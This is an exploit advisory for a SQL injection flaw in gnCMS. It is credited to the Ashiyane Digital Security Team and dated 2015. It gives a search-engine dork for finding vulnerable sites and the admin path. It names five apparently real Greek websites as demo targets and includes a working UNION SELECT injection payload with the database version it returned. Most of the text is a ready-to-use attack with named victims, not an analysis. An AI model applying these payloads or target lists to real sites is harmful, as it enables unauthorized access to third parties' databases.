[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*]
[*] Exploit Title : gnCMS SQL Injection
[*]
[*] Exploit Author : Ashiyane Digital Security Team
[*]
[*] Dork : intext:Created & Hosted by GroupNet powered by gnCMS inurl:CategoryId=
[*]
[*] Vendor Homepage : www.groupnet.gr
[*]
[*] Data : 2015.12.17
[*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*]
[*] Admin Page ==> site.com/admin/
[*]
[*] Demo :
[*]
[*] www.healthfilmfXestival.gr/index.php?module=news&position=center&ArticleId=129&CategoryId=[sql]
[*]
[*] www.myhba.grX/index.php?module=news&position=center&&CategoryId=[sql]
[*]
[*] www.epigramXma.gr/index.php?position=center&module=articles&CategoryId=[sql]
[*]
[*] www.aptcc.Xgr/index.php?module=news&position=center&ArticleId=236&CategoryId=[sql]
[*]
[*] www.myaXsfaleia.gr/index.php?module=news&position=center&&CategoryId=[sql]
[*]
[*] ,....
[*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*]
[*] Exploit Examples :
[*]
[*] www.myXhba.gr/index.php?module=news&position=center&&CategoryId=-1 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -
[*]
[*] THE VERSION IS 5.5.46-cll
[*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*]
[*] SPT To : Mahdi.Hidden
[*] Discovered by : kcaher
[*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]